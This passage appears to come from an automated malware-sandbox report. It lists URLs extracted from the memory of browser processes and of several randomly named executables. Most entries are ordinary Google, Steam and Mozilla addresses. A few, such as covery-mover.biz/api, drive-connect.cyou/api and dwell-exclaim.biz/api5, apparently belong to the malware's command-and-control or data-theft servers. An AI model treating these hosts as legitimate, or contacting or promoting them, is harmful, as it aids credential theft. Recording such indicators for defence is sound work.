Source: chrome.exe, 00000019.00000003.2441094805.00006AE40158C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441242471.00006AE401594000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441134276.00006AE401590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2441051239.00006AE401588000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2738878513.000067A00078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2367758796.000067A000684000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000019.00000003.2366948695.000067A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2366620579.000067A000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000019.00000003.2382744868.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378757374.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377308917.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742968890.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2379362869.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000019.00000003.2382744868.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378757374.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377308917.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742968890.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2379362869.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000019.00000002.2739413377.00006AE40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://classroom.googleapis.com/_
Source: chrome.exe, 00000019.00000002.2745983835.00006AE400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/c
Source: chrome.exe, 00000019.00000002.2747569089.00006AE4006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2810389344.00006AE400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2739413377.00006AE40001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2746724756.00006AE400670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2747791390.00006AE4006F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000019.00000002.2808960005.00006AE400A8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000019.00000002.2741441240.00006AE4001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000019.00000003.2378286641.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2380837184.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2746724756.00006AE400670000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: 3b636bd67f.exe, 00000013.00000003.2240775221.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001466000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: 3b636bd67f.exe, 00000013.00000003.2240775221.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: 3b636bd67f.exe, 00000013.00000003.2240775221.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: 3b636bd67f.exe, 00000013.00000003.2240775221.00000000014C3000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240011806.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847278204.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847102391.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847786344.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: c2bea0d661.exe, 00000011.00000002.3456856261.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: c2bea0d661.exe, 00000011.00000002.3456856261.00000000036B0000.00000004.00000020.00020000.00000000.sdmp, c2bea0d661.exe, 00000011.00000002.3461733479.0000000003E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2830333086.0000020DC1303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: 3b636bd67f.exe, 00000013.00000003.2240869802.0000000001471000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2243929157.0000000001482000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000002.2257312744.0000000001484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://covery-mover.biz/api
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000019.00000003.2438398566.00006AE4014B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744464354.00006AE400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000019.00000002.2806733327.00006AE40080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806626138.00006AE4007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811325321.00006AE400C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744821200.00006AE4004CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000019.00000002.2806733327.00006AE40080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806626138.00006AE4007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811325321.00006AE400C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744821200.00006AE4004CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000019.00000002.2806733327.00006AE40080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806626138.00006AE4007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2811325321.00006AE400C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744821200.00006AE4004CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/J
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744464354.00006AE400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000019.00000002.2806209754.00006AE400748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744945679.00006AE4004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812080632.00006AE400D30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742340293.00006AE4002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000019.00000002.2806209754.00006AE400748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2744945679.00006AE4004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2812080632.00006AE400D30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/api
Source: 3b636bd67f.exe, 00000013.00000002.2257128691.000000000143C000.00000004.00000020.00020000.00000000.sdmp, 3b636bd67f.exe, 00000013.00000003.2240869802.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/apiNp
Source: chrome.exe, 00000019.00000003.2394154730.00006AE40120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE400304000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000019.00000003.2382744868.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2393461292.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806111394.00006AE400732000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2378757374.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2377308917.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2742968890.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000003.2379362869.00006AE40034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000019.00000002.2810891937.00006AE400C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000019.00000002.2808404693.00006AE4009DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000019.00000002.2810540411.00006AE400C20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000019.00000002.2810891937.00006AE400C50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000019.00000002.2810891937.00006AE400C50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: a629a70424.exe, 00000018.00000003.2849227403.0000000000E3A000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000002.2865129705.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, a629a70424.exe, 00000018.00000003.2847696880.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dwell-exclaim.biz/api5
